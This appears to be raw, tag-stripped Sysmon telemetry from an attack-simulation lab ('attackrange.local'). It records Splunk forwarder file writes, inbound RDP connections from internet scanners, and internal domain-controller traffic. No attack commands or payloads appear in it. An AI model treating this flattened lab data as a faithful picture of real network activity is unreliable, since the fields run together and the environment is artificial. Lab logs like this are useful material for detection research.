Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B42F7B158C9D5277A7D5CF24CEF00B97,SHA256=FD672A9EA1C2A2A16743E61BDD49A8ACA378B779A66B9278749ADA5DA2F15CA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051243Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:08.089{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77F46F8F09FF22AB671FAE0D72D1E427,SHA256=867D09931416D6CF25B2DC8966085160B07A01FF692B65D05639362F2925FBC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:09.197{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=10512B3AA27A3C6B3B3464299B043B11,SHA256=659F240BEBEFB5873BBF6E863339130DFCB0CBC755A2A7B130809E21839B16E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:09.150{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA28D608AB86F4D6DFD7B97BDFD8FFD9,SHA256=9DDCE0102C4B30AF1F574FB6391BA08370F6C50A3593E717CB5EA63A7FD6486D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051247Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:09.855{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BE124DE5E710B08EB7D4B622818E2FD,SHA256=FD2C1CCBD0E25DA305D018B2B2F9DA6CAE176E19088FC0E51F0514F71B0652F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051246Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:07.818{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50924-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051245Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:09.276{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5F3EC2252132AF291EFCDB35D6C6021,SHA256=9C2E6711C55FD33D34A3E8D721C3ECAD26D60159730EAF67ED63DE710F3CFE63,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:08.657{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com54159-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:10.275{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9B5C832A3E995ECC6B13A479BB876AE4,SHA256=923885808DBFE316AAC9FF2F5C070C5D8E77738C9A99FCF733F1DB3248644ED7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:10.166{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9CBED18DDAF4D06D5936AACBE26228A,SHA256=5DA7D2EBCD0DF3D3C6BC927E3CFEE35C49053279D24A8FA9AF9C256517E6914E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051248Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:10.901{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA91D8B292766E92C1B449E89A874F4B,SHA256=67669722B4F947455437E4E2259C15DC695B4DCCC2DF15866B36192028FE5D2F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:10.734{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54150-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:10.558{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56849-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:11.182{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9763140FD324D6D85CB08EB688BA10A5,SHA256=76D208E3715DB8B869F767C0C08A3097BEC25B4EB5A19BF311B2B2FB3E334E9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051251Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:11.917{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA5C52057FBC5B30C492354DB3447A23,SHA256=DBC77BB04504B40D8D905B8409FFD379A8EF3886C9B6983749DFD94323E5454C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051250Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:09.137{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49447-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051249Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:11.026{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8754D6EBA8EF30307A3CFBFD1548D86C,SHA256=C441EA6647914E2179C7B0A369BA6B666C9F005A7696472C5BA0520E9D04D03D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:12.416{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F175FDD409452B529A4D95D13335BF2A,SHA256=7474A0452F89137C6D59DF0AAB1FB4BAEC6B18AF2BDD890BE8E9AAE370BA0E3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051254Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:12.948{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=237001A5FF7DC39CCADF1A6D1EAF7298,SHA256=31AD2C841849C3DA958BA84904938E7DBC2FA7FFE99835980395595FBAEB0789,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051253Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:10.971{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53858-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051252Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:09.694{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52572-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000082556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:13.432{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2566674D2C19EF4D397892E17E12BAAA,SHA256=0C5E7AF42CC570A4EE4870729DE9D46FF1FC68874EDAF5AFB69EB87DFD83C37F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:13.260{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A953BA534C1530A5990EE1687B17D46E,SHA256=EF9E11D4DEF471EF17C118AC92C71A7C1CDF2591C5A28CDA1FAB91316B6F30F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051255Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:13.995{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30D548874DAB2660851CE9989A1A33E2,SHA256=72D690E43186D9600088E9E3D05DB42B50182C24EF8B0A5F7EB76196B2FF8149,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:14.494{A7A01FEF-DF97-607E-4709-00000000BB01}6584ATTACKRANGE\AdministratorC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6584.xml~RFd55288.TMPMD5=CDC37ABBACDC5A35D39581DFA1E69C56,SHA256=FD0C987C4EA499B0EF3F04D736EF983ED8B5570A1B8575164A63E0D9F0953E2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:14.494{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=38F3E08EAEA130DC9F405C657E6BC569,SHA256=B2CB88D5E1469FEDE55A5C796068E720F769B964AD15F2F3F632DA4199AE27D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:14.479{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AE987EB0AD3FFBF256C8C3949A1E38A,SHA256=18A41BFDDD43341B5A0530EA5D4512211CF672EFF50AE4FEB1C8158416F38EA0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051258Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:12.501{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55308-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051257Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:12.361{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52390-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051256Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:14.433{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC63FA9E72141588AC4F976D0FE22DC5,SHA256=50323E39AFD73B3FCEF8C1F01AE67A27E8C25814D4DFB847B6A09314B7151D96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:15.541{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7A46F42C60F369A79BDF15CACCD2C2E,SHA256=17D93DFBA778267B7458A4899A123BE68643A65B3F1A2766C8076B7AC644D9E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:13.455{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59543-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:13.438{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com60447-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:13.104{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57680-false10.0.1.12-8000- 354300x800000000000000051261Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:14.017{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56758-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051260Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:13.874{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52573-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x800000000000000051259Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:15.089{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A01058FD6042E6D3B771F8BBC2E0EE3A,SHA256=244DDA5CD093B88EFB455652E8C7023EFB85B96BA718219B460C197B25640FA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:16.557{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9B283468BA54CAC255BF47DC3EAB4E4,SHA256=BE2176428FE36E2EF1683307BFB973F1227DEF90B6FB8A253C1BF5D488BC35D4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:14.315{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal52573-false10.0.1.14win-dc-339.attackrange.local49676- 23542300x800000000000000051263Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:16.183{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=522ED812EE2F7D9C9E94C6889906BC46,SHA256=6A1FBA33AE1839778951CB34A15CFBB2C4687AA294CF02D0CABACCD07D92F8E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051262Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:16.105{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AECCE7EDC6A00AA145031C2A45D03A56,SHA256=901ABFC6731D9C76C825E9FE51C526ABCD46B31D898C407EAC7FBC8D2D15E924,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:17.572{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3564BD915A1B7D9C71424FEEB7FF8B9,SHA256=840E9A037A673D784AA9B9576DFE94597E5224427FF7B61757AF510F5974AB25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:17.307{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=467A39463B166784AC00D7FF9381257C,SHA256=F7C08109BE1A457801A1765F9E159EF139C2E4146018C9F8EBAD1DE88CFD1917,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:15.194{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com62039-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:15.086{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58196-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000051266Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:17.823{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C578DAE0CFC7BDFBDB6BF92F66CB2AA,SHA256=EDC2F34059568CA6C544614EF49B37134798240E760859E6D8DE807EC02BAEBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051265Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:17.120{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B13242C32EBC555E9F853C37B4DF93C,SHA256=D38A9609FBCCD312BF9976795D41B0BDB987A67EE17695F1308AB59D28D3B1F0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051264Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:14.315{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com59919-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:18.713{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D09F36BC8ADACB26D03B265A3FF55B6C,SHA256=4C846F0073ADEA18BF2F3272C03A4EEF43B6DAE6E2819790CD90D979A1A4FD12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:18.400{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F4DDAA70F7158A9053A5305DFDF56060,SHA256=EEAAF73613D4296EE848AB6E70773A906B769E6177DB6E4A65E979B6758C8035,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:16.490{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-3260-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000051270Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:18.136{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F306C3B2F9B2B5D1E9236850E5E380C1,SHA256=BF08C63721578580BCF342D1F7885814A443B4AD1784DB4912AA659FEFBFF4F0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051269Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:15.678{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52574-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000051268Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:15.633{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58207-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051267Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:01:15.370{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com64364-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:19.744{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76CA95E4A3CC6894AA7C998777CB982D,SHA256=7F49905E0ED39D3E0934E4B1FE5B39C15B3DBDA3CFB1A99DD804812A4A1CFFDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:19.697{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=270FB5AAC05221EC76C79DDB2B49E025,SHA256=DEA3E978C98C9F383DED275C4407F2985291732295E3A763861C4B153DCC73C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:18.166{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57681-false10.0.1.12-8000- 354300x800000000000000082575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:18.155{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55499-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:17.909{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-4608-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:01:17.667{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT 